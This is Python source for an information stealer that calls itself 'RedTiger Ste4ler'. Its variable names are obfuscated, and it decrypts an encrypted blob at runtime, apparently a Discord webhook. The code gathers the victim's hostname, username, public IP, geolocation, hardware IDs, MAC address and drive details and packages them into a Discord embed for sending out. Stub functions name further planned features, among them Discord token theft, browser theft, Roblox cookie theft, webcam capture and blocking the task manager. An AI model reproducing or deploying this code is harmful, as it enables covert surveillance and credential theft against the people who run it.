
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: CHUASFVYYUXNAFUPECQIVYARRNVNWPUWKGCXWPMFWSQOBAEPZGKWFNLUETUMQW = On1y_W1nd0w5()
except: CHUASFVYYUXNAFUPECQIVYARRNVNWPUWKGCXWPMFWSQOBAEPZGKWFNLUETUMQW = False

if CHUASFVYYUXNAFUPECQIVYARRNVNWPUWKGCXWPMFWSQOBAEPZGKWFNLUETUMQW == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data = base64.b64decode(UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ)
    v4r_salt = UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data[:16]
    v4r_iv = UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data[16:32]
    UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data = UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(UTODBMAPIGMZSYEEPLVJLWMILHQEZXHKLSFJVIZDJNBOTEWFLCHRNOHWLXTTSHAAFTRDHYHYQHUIPLUXOTRKFJ_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

IBUYZDWGRHSPBJINUENCVIJUSBLKNUBJOPJBOGOLKZIGISOEAPPZFDZ = r"""
7pJWHfiYwExWp4eG8C1RAxzb5iXDQRu5aMTosotpKB3r9x6JpOopOw+fZWm91GmsMzN19MQhmYo7KR3sWb/4xgDPATmLvZxD9OYzyInfPBsVG+09jca+8IwJXwv441FX8OXTRQawD8bJf7F4rRUCTHlhX5am+7nYPhNBlOV8wBDUV4gyn6WX0/J1QV5gprg7nqoAJ22qld4YRhxkURcwag==
"""
CONWKVEIYLLQHRFAQFUJHWRLKGONCLYISWHWJMYFHWBJVPJFZDJJKSWMZILWUHMJLGMQRJUZRIKWHXNZDSPAFEPTO = "ciBCTOKaurUVLOjWgRccIZLrpSqFxPqxdckXIipUKtFDonMotkxjUEftoMeLtzprfyFOYgMSKitWDIqNOAPjmFGaUyTHZNHAsBoHmpeCAWGhCAaQcmPTCxGUEPEjsiRKNC"
WCZOPJTNIIMLFLZYDRUNXMVGYLRYZRMRQVJEBTDQOQGKELYYCHPQFCCTLWFUUXUAWVPBITL = "redtiger.shop"
BDFLBKPPAYCEVJQPWDIWXNXQUNECVISUTKVOYQCDWYOBEGMWZFQDCETZCYLEXDATKFHPTLDCMSBLZSTHFPCWDMRO = 0xa80505
UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO = "RedTiger Ste4ler"
YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
NBDPMWIGZSQUQVDUQFLEXGMFSAOIMQPTDPVPFOYDNQXAVNCDRDTDGKYGE = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
RSLLYLFTGTRRWGMDEAJZFSIFTSQASAMYCOCSOHTSPENWTLRSHEQMIOTHJRFMESFXXRVZLTFRMYLZPWGDEDLLQJBKYKL = {
        "text": NBDPMWIGZSQUQVDUQFLEXGMFSAOIMQPTDPVPFOYDNQXAVNCDRDTDGKYGE,
        "icon_url": YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ,
        }
                 
COFKNPMTPGIKKBAIQORAXHJSSLQJRBIPMSVNXJVMZFDTKEASGWOU = Decrypt(IBUYZDWGRHSPBJINUENCVIJUSBLKNUBJOPJBOGOLKZIGISOEAPPZFDZ, CONWKVEIYLLQHRFAQFUJHWRLKGONCLYISWHWJMYFHWBJVPJFZDJJKSWMZILWUHMJLGMQRJUZRIKWHXNZDSPAFEPTO)

try: JULXDXSCVVAKDBYWWCVWJNEKVQQSSBHFUKLZJMCVBDJTSNOZQCAUTQPSAENKOTHDJCYWBZERACHTGNLSAOXOBRHQKLBBE = socket.gethostname()
except: JULXDXSCVVAKDBYWWCVWJNEKVQQSSBHFUKLZJMCVBDJTSNOZQCAUTQPSAENKOTHDJCYWBZERACHTGNLSAOXOBRHQKLBBE = "None"

try: KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU = os.getlogin()
except: KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU = "None"

try: WYMLPXUGURTPPTKDSLJTGIEZGZRZQZBDHFKKWWIBDGIEQEREOSUTUMNRMPVSRFBIFZWLJTHN = win32api.GetUserNameEx(win32api.NameDisplay)
except: WYMLPXUGURTPPTKDSLJTGIEZGZRZQZBDHFKKWWIBDGIEQEREOSUTUMNRMPVSRFBIFZWLJTHN = "None"

try: LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH = "None"

try: XGFNYRZJZXCPTPAXUFHVZMFHJUEFYAMILAFJQTBMJJZVJLZNJNXMYJIFGNMUKEVLLWBJGS = socket.gethostbyname(socket.gethostname())
except: XGFNYRZJZXCPTPAXUFHVZMFHJUEFYAMILAFJQTBMJJZVJLZNJNXMYJIFGNMUKEVLLWBJGS = "None"

try:
    ZVYPXPFFQLYUNQCXICQTKWUJGGCESSCUDDTGGIGVYPLUQOMNKHQUKGGSCSLURBIQFBOCVHLIDGXERWRONDUO = requests.get(f"https://{WCZOPJTNIIMLFLZYDRUNXMVGYLRYZRMRQVJEBTDQOQGKELYYCHPQFCCTLWFUUXUAWVPBITL}/api/ip/ip={LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}")
    INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR = ZVYPXPFFQLYUNQCXICQTKWUJGGCESSCUDDTGGIGVYPLUQOMNKHQUKGGSCSLURBIQFBOCVHLIDGXERWRONDUO.json()

    PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('country', "None")
    PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW_code = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('country_code', "None")
    ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('region', "None")
    ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP_code = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('region_code', "None")
    CVEPETSPJIYWXAXAPUQFOZBWVHWVLAPRNOTICDXCVDCLBODHSORGJTKTJAPSJ = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('zip', "None")
    JDCDLWMTWHTYTXYZXGYMIOFPGGFWFIEEMFHWVRJQFNXIOQHRZWKTMYDRAMUYKUNVAWSAOUWFXNNCWBWHYOQBXO = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('city', "None")
    GGIBDTVSXKFPKYATLNRPNZXZFTXGXIUTEFPGVQLDREUWOTRPFUHGMMOARXOWGFAVSKHPDZEROUUTFSZORNN = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('latitude', "None")
    QXTUJIURPJALVHIBMTRPZYRASPSIIPUCCVNFHZHFYYAXWVHMOZXRXHALULEZWAKXIHZLCHWCG = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('longitude', "None")
    OYBAOKBMFTYJONOZJXKCWZOMQCTMAQIQGTWHVMPOWHDXPZWBHYOATXSTUQAAJLWICPFCBWLIYUAKSLLKDAUKPXPFINXQSLSZRJ = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('timezone', "None")
    OMVGGCBMCYVAKDOHLUXSNMUTATDCAYKHYTMHUFEUWHYJVLFJTTIMJVYRKJN = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('isp', "None")
    ZWNCSMUZJRRBGLIHCHAMMRMPNAOYISJECPPQOWVSLRHPXYGVAMNAC = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('org', "None")
    VSXQHILHWLUTLCAMKYKZVVIVMQHHBCVDICTLJLPVLRWUPZKBJUGDMAOCIOYFDHOPFCMTVKJGYZNYOXTGELK = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('as', "None")
except:
    ZVYPXPFFQLYUNQCXICQTKWUJGGCESSCUDDTGGIGVYPLUQOMNKHQUKGGSCSLURBIQFBOCVHLIDGXERWRONDUO = requests.get(f"http://ip-api.com/json/{LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}")
    INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR = ZVYPXPFFQLYUNQCXICQTKWUJGGCESSCUDDTGGIGVYPLUQOMNKHQUKGGSCSLURBIQFBOCVHLIDGXERWRONDUO.json()

    PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('country', "None")
    PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW_code = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('countryCode', "None")
    ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('regionName', "None")
    ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP_code = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('region', "None")
    CVEPETSPJIYWXAXAPUQFOZBWVHWVLAPRNOTICDXCVDCLBODHSORGJTKTJAPSJ = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('zip', "None")
    JDCDLWMTWHTYTXYZXGYMIOFPGGFWFIEEMFHWVRJQFNXIOQHRZWKTMYDRAMUYKUNVAWSAOUWFXNNCWBWHYOQBXO = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('city', "None")
    GGIBDTVSXKFPKYATLNRPNZXZFTXGXIUTEFPGVQLDREUWOTRPFUHGMMOARXOWGFAVSKHPDZEROUUTFSZORNN = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('lat', "None")
    QXTUJIURPJALVHIBMTRPZYRASPSIIPUCCVNFHZHFYYAXWVHMOZXRXHALULEZWAKXIHZLCHWCG = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('lon', "None")
    OYBAOKBMFTYJONOZJXKCWZOMQCTMAQIQGTWHVMPOWHDXPZWBHYOATXSTUQAAJLWICPFCBWLIYUAKSLLKDAUKPXPFINXQSLSZRJ = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('timezone', "None")
    OMVGGCBMCYVAKDOHLUXSNMUTATDCAYKHYTMHUFEUWHYJVLFJTTIMJVYRKJN = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('isp', "None")
    ZWNCSMUZJRRBGLIHCHAMMRMPNAOYISJECPPQOWVSLRHPXYGVAMNAC = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('org', "None")
    VSXQHILHWLUTLCAMKYKZVVIVMQHHBCVDICTLJLPVLRWUPZKBJUGDMAOCIOYFDHOPFCMTVKJGYZNYOXTGELK = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('as', "None")

def Sy5t3m_Inf0():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: DKCAVMPAXFXHNUJUXSRHMZDRTADASGFDJSACZPEGCEQCZPHMYXBCEVLOYDNPJZVCIQTPZXEUTBHGHN = {platform.system()}
    except: DKCAVMPAXFXHNUJUXSRHMZDRTADASGFDJSACZPEGCEQCZPHMYXBCEVLOYDNPJZVCIQTPZXEUTBHGHN = "None"

    try: AVRKTFVPFIJUYYFRSSLTNSCATIODSFYFJVLNDIUYLDFHJXCCKVPJQPKSCAHNVBFTWSDXIMGKKTKEWFDRSTJDCLMMKJKNQMD = platform.version()
    except: AVRKTFVPFIJUYYFRSSLTNSCATIODSFYFJVLNDIUYLDFHJXCCKVPJQPKSCAHNVBFTWSDXIMGKKTKEWFDRSTJDCLMMKJKNQMD = "None"

    try: BBVBPEHROZZETFZPROAHSFMITUOTQFOFTAGWBNMZSBWYRZVRIJEYJUVPFURGDEQFCVRSKNEQ = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: BBVBPEHROZZETFZPROAHSFMITUOTQFOFTAGWBNMZSBWYRZVRIJEYJUVPFURGDEQFCVRSKNEQ = "None"

    try: DPRCSBDEGRSPSIUTYTACSVQEPFMMETILYLZSIBUHAESTDPMLXJSBMOEUCALLYEYDUUHFQZOBHIAM = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: DPRCSBDEGRSPSIUTYTACSVQEPFMMETILYLZSIBUHAESTDPMLXJSBMOEUCALLYEYDUUHFQZOBHIAM = "None"

    try: FIWBMHSTHSBMMAAAMQHVOQJHQAWUTZBEEZWYJTJOQAISMOCUDQKKHLXDHPWJZ = round(psutil.virtual_memory().total / (1024**3), 2)
    except: FIWBMHSTHSBMMAAAMQHVOQJHQAWUTZBEEZWYJTJOQAISMOCUDQKKHLXDHPWJZ = "None"

    try: DVADBJAVRVHAHSHWOKRKFLGUVXSRQBEZRXIGRQWGMVXGGVDTXBQZGZGDQBBH = platform.processor()
    except: DVADBJAVRVHAHSHWOKRKFLGUVXSRQBEZRXIGRQWGMVXGGVDTXBQZGZGDQBBH = "None"

    try: FJATTAUGVJHATUMHYVEDXZEFJZMURMFZINNPMOHZEAVAANGMYJJEOTKJWPOTONROXATWNXG = psutil.cpu_count(logical=False)
    except: FJATTAUGVJHATUMHYVEDXZEFJZMURMFZINNPMOHZEAVAANGMYJJEOTKJWPOTONROXATWNXG = "None"

    try: YZPGQZJBUECKNFWQQTJJZHQHSHXKWKSAXHFIACIPFOEOTNACXQKMWWVCTYJYLEXRXZMCBWLFBUGCETMKBOTFRCUYBCG = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: YZPGQZJBUECKNFWQQTJJZHQHSHXKWKSAXHFIACIPFOEOTNACXQKMWWVCTYJYLEXRXZMCBWLFBUGCETMKBOTFRCUYBCG = "None"

    try:
        GLTRRDPOHYWVQECMCDXRKPUBWGKEOLNDPBVLNJDBYRVQMFYIBEMCNBVHYIUOESIIVYLEU = []
        DEAIVFZKKPAYRFLDKOCIPUXAZZLODAYJHSBATQTKNIZJMTIKGTVOODQATAYVNNLJCPKTAUIAECCZJXVEJYIXHORLNEMERCB = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if DEAIVFZKKPAYRFLDKOCIPUXAZZLODAYJHSBATQTKNIZJMTIKGTVOODQATAYVNNLJCPKTAUIAECCZJXVEJYIXHORLNEMERCB & 1:
                JAUHTXERHEDVWGIEOQLGUSMSVONHOFMQXYQCNEAXCZKMATUHGIDHHIDYJYCFOIPCYJQTGGGTZFAMKGVCEIQAMF = v4r_letter + ":\\"
                try:
                    IYDAQXHRFWXKZBLLPSFMAKZEUVDOOUKBWJCZJJANMEWJZVGFGCGUFNYDRPMETGRKUFSFFAUKCLJHHFGEAOHWKDEUW = ctypes.c_ulonglong(0)
                    AGLLIQOUTZIUDZIABUGHDOWKMVOHPYBKGLNJPYCCSTHHEICDOSJNGW = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(JAUHTXERHEDVWGIEOQLGUSMSVONHOFMQXYQCNEAXCZKMATUHGIDHHIDYJYCFOIPCYJQTGGGTZFAMKGVCEIQAMF), None, ctypes.pointer(AGLLIQOUTZIUDZIABUGHDOWKMVOHPYBKGLNJPYCCSTHHEICDOSJNGW), ctypes.pointer(IYDAQXHRFWXKZBLLPSFMAKZEUVDOOUKBWJCZJJANMEWJZVGFGCGUFNYDRPMETGRKUFSFFAUKCLJHHFGEAOHWKDEUW))
                    VOIQVJAABRQOSENWKNIUXTEOMIZKZEDKSNTPGEKWUCQDYZXXZT = AGLLIQOUTZIUDZIABUGHDOWKMVOHPYBKGLNJPYCCSTHHEICDOSJNGW.value
                    SRDMGQHENUJXMEYURFLRUMNLPCSZOGUXXMXQLTYZEQQJKDOIOYJAIULXVSAOKODXMBERYZSDYUNAZJZYO = IYDAQXHRFWXKZBLLPSFMAKZEUVDOOUKBWJCZJJANMEWJZVGFGCGUFNYDRPMETGRKUFSFFAUKCLJHHFGEAOHWKDEUW.value
                    VTMPFUDUAKUEVHEPNTBHJUCBLPFKXSGVYOMCIFHTMLFEPNAHFVINYPCYDJCXMJNRORMAKYBDOHZVPLDQUFPIV = VOIQVJAABRQOSENWKNIUXTEOMIZKZEDKSNTPGEKWUCQDYZXXZT - SRDMGQHENUJXMEYURFLRUMNLPCSZOGUXXMXQLTYZEQQJKDOIOYJAIULXVSAOKODXMBERYZSDYUNAZJZYO
                    CAQBUOSGJBFPTCFCMAYFBWEJUVWYTHLCKTNHRKLALAOXPZZHEXNMU = win32api.GetVolumeInformation(JAUHTXERHEDVWGIEOQLGUSMSVONHOFMQXYQCNEAXCZKMATUHGIDHHIDYJYCFOIPCYJQTGGGTZFAMKGVCEIQAMF)[0]
                    drive = {
                        'drive': JAUHTXERHEDVWGIEOQLGUSMSVONHOFMQXYQCNEAXCZKMATUHGIDHHIDYJYCFOIPCYJQTGGGTZFAMKGVCEIQAMF,
                        'total': VOIQVJAABRQOSENWKNIUXTEOMIZKZEDKSNTPGEKWUCQDYZXXZT,
                        'free': SRDMGQHENUJXMEYURFLRUMNLPCSZOGUXXMXQLTYZEQQJKDOIOYJAIULXVSAOKODXMBERYZSDYUNAZJZYO,
                        'used': VTMPFUDUAKUEVHEPNTBHJUCBLPFKXSGVYOMCIFHTMLFEPNAHFVINYPCYDJCXMJNRORMAKYBDOHZVPLDQUFPIV,
                        'name': CAQBUOSGJBFPTCFCMAYFBWEJUVWYTHLCKTNHRKLALAOXPZZHEXNMU,
                    }
                    GLTRRDPOHYWVQECMCDXRKPUBWGKEOLNDPBVLNJDBYRVQMFYIBEMCNBVHYIUOESIIVYLEU.append(drive)
                except:
                    ()
            DEAIVFZKKPAYRFLDKOCIPUXAZZLODAYJHSBATQTKNIZJMTIKGTVOODQATAYVNNLJCPKTAUIAECCZJXVEJYIXHORLNEMERCB >>= 1

        KHDYHQMFPGYVCZZUJDCACWCDSDMVFSBQTBTOMKCMKIXPRZLMWZILEZGOPUUTVBIUJDKZYAD = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in GLTRRDPOHYWVQECMCDXRKPUBWGKEOLNDPBVLNJDBYRVQMFYIBEMCNBVHYIUOESIIVYLEU:
            ERTNODWKDDUWZSTVPBJYDXTKBKVAGYIUEIRIXRJESZQWUXNGUEHWTZL = (v4r_drive['used'] / v4r_drive['total']) * 100
            SRDMGQHENUJXMEYURFLRUMNLPCSZOGUXXMXQLTYZEQQJKDOIOYJAIULXVSAOKODXMBERYZSDYUNAZJZYO_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            VOIQVJAABRQOSENWKNIUXTEOMIZKZEDKSNTPGEKWUCQDYZXXZT_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            ERTNODWKDDUWZSTVPBJYDXTKBKVAGYIUEIRIXRJESZQWUXNGUEHWTZL_str = "{:.2f}%".format(ERTNODWKDDUWZSTVPBJYDXTKBKVAGYIUEIRIXRJESZQWUXNGUEHWTZL)
            KHDYHQMFPGYVCZZUJDCACWCDSDMVFSBQTBTOMKCMKIXPRZLMWZILEZGOPUUTVBIUJDKZYAD += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   SRDMGQHENUJXMEYURFLRUMNLPCSZOGUXXMXQLTYZEQQJKDOIOYJAIULXVSAOKODXMBERYZSDYUNAZJZYO_gb,
                                                                   VOIQVJAABRQOSENWKNIUXTEOMIZKZEDKSNTPGEKWUCQDYZXXZT_gb,
                                                                   ERTNODWKDDUWZSTVPBJYDXTKBKVAGYIUEIRIXRJESZQWUXNGUEHWTZL_str,
                                                                   v4r_drive['name'])
    except:
        KHDYHQMFPGYVCZZUJDCACWCDSDMVFSBQTBTOMKCMKIXPRZLMWZILEZGOPUUTVBIUJDKZYAD = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def is_portable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if is_portable():
            SNTILYCJJDHQXEINIVIQQZUUBULPFCWQIAVMGJMVFDVMIZWREQEUOADDDTJCYOYTUTBOKLIDBUONIOTPODJIFPXCOQWT = 'Pc Portable'
        else:
            SNTILYCJJDHQXEINIVIQQZUUBULPFCWQIAVMGJMVFDVMIZWREQEUOADDDTJCYOYTUTBOKLIDBUONIOTPODJIFPXCOQWT = 'Pc Fixed'
    except:
        SNTILYCJJDHQXEINIVIQQZUUBULPFCWQIAVMGJMVFDVMIZWREQEUOADDDTJCYOYTUTBOKLIDBUONIOTPODJIFPXCOQWT = "None"

    try: WBNMYTIOXRSEZLWDKHQLPSIYBQXVREZQVEUIOCCXRDCCMOYPEJTUWGPUNPBAKMASVBYHXHPZE = len(screeninfo.get_monitors())
    except: WBNMYTIOXRSEZLWDKHQLPSIYBQXVREZQVEUIOCCXRDCCMOYPEJTUWGPUNPBAKMASVBYHXHPZE = "None"

    embed = Embed(title=f'System Info `{KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU} "{LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}"`:', color=BDFLBKPPAYCEVJQPWDIWXNXQUNECVISUTKVOYQCDWYOBEGMWZFQDCETZCYLEXDATKFHPTLDCMSBLZSTHFPCWDMRO)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {JULXDXSCVVAKDBYWWCVWJNEKVQQSSBHFUKLZJMCVBDJTSNOZQCAUTQPSAENKOTHDJCYWBZERACHTGNLSAOXOBRHQKLBBE}
Username    : {KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU}
DisplayName : {WYMLPXUGURTPPTKDSLJTGIEZGZRZQZBDHFKKWWIBDGIEQEREOSUTUMNRMPVSRFBIFZWLJTHN}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {SNTILYCJJDHQXEINIVIQQZUUBULPFCWQIAVMGJMVFDVMIZWREQEUOADDDTJCYOYTUTBOKLIDBUONIOTPODJIFPXCOQWT}
Exploitation  : {DKCAVMPAXFXHNUJUXSRHMZDRTADASGFDJSACZPEGCEQCZPHMYXBCEVLOYDNPJZVCIQTPZXEUTBHGHN} {AVRKTFVPFIJUYYFRSSLTNSCATIODSFYFJVLNDIUYLDFHJXCCKVPJQPKSCAHNVBFTWSDXIMGKKTKEWFDRSTJDCLMMKJKNQMD}
Screen Number : {WBNMYTIOXRSEZLWDKHQLPSIYBQXVREZQVEUIOCCXRDCCMOYPEJTUWGPUNPBAKMASVBYHXHPZE}

HWID : {DPRCSBDEGRSPSIUTYTACSVQEPFMMETILYLZSIBUHAESTDPMLXJSBMOEUCALLYEYDUUHFQZOBHIAM}
MAC  : {BBVBPEHROZZETFZPROAHSFMITUOTQFOFTAGWBNMZSBWYRZVRIJEYJUVPFURGDEQFCVRSKNEQ}
CPU  : {DVADBJAVRVHAHSHWOKRKFLGUVXSRQBEZRXIGRQWGMVXGGVDTXBQZGZGDQBBH}, {FJATTAUGVJHATUMHYVEDXZEFJZMURMFZINNPMOHZEAVAANGMYJJEOTKJWPOTONROXATWNXG} Core
GPU  : {YZPGQZJBUECKNFWQQTJJZHQHSHXKWKSAXHFIACIPFOEOTNACXQKMWWVCTYJYLEXRXZMCBWLFBUGCETMKBOTFRCUYBCG}
RAM  : {FIWBMHSTHSBMMAAAMQHVOQJHQAWUTZBEEZWYJTJOQAISMOCUDQKKHLXDHPWJZ}Go```""", inline=False)

